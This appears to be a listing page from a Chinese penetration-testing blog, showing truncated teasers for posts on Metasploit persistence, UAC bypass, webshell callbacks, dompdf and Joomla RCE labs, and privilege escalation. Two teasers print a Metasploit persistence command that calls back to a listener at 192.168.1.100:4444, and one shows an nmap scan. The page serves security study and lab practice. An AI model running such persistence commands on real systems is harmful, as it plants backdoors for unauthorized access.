内容速览 一、信息收集 收集的内容包括目标系统的组织架构、IT资产、敏感信息泄露、供应商信息等各个方面,通过对收集的信息进行梳理,定位到安全薄弱点,从而实施下一步的攻击行为。 域名收集 1.备案查询 ...
Metasploit 常用维权方式
metasploit 后渗透常用的维持权限的方式. 注册表上传 vbs 开机自启 (被弃用). run persistence -r 192.168.1.100 -p 4444 -i 5 -P win...
Windows 单机权限维持
Windows 单机权限维持 注册表上传 vbs 开机自启 (被弃用). run persistence -r 192.168.1.100 -p 4444 -i 5 -P windows/x64/me...
Windows 绕过 UAC 策略
UAC 全称 User Access Control, 其作用为在程序进行管理员权限的操作时对用户进行通知, 经确认以后方可才能继续执行操作. 如果是普通用户, UAC 会让你提供管理员用户的账号密码...
MSF Webshell 上线
ngrok 内网穿透, 搭配 metasploit 实现 webshell 上线. ngrok.cc 注册账号 开通隧道 类型 tcp 下载客户端 我的是 linux arm 运行 ./sunny c...
利用dompdf漏洞从XSS到RCE
0x00 前言 这个漏洞是在去年的三月份爆出来的,今天刚好遇到这个漏洞的环境,遂写一文记录。 0x01 漏洞详情 漏洞描述 dompdf是一个用于将HTML转换为PDF的PHP库,由于其易用性和广泛的...
从用CentOS安装Docker靶场到Joomla 3.4.5 反序列化漏洞复现(每日一洞)
0x01 前言 最近天气突然变凉,导致我直接病倒在床,今天才缓过来。 上次的用Docker来搭建各种漏洞靶场(妈妈再也不用担心我没有靶场练习了)讲的是Windows搭建,这次就以CentOS作为Dok...
用Docker来搭建各种漏洞靶场(妈妈再也不用担心我没有靶场练习了)
1. 前言 最近练习也在搭建这个漏洞环境,但是很费时间,然后就想到用Docker搭建比较快,又方便。不多废话,直接开始吧! 2. 下载Docker 我本次是利用Windows 10 来安装Docker...
一个简单的Shiro RCE检测和利用脚本。
=================================== 免责声明 请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,...
SLAM漏洞曝光:影响Intel、AMD和Arm CPU的新Spectre漏洞
Researchers from the Vrije Universiteit Amsterdam have disclosed a new side-channel attack called SL...
新土豆提权工具
工具简介通过在Windows 10、Windows 11和Server 2022上滥用SeImpersonatePrivilege特权可以从LOCAL/NETWORK SERVICE提升为SYSTEM...
【Web渗透】 Photographer靶机
kali:192.168.111.111靶机:192.168.111.132信息收集端口扫描nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111....
35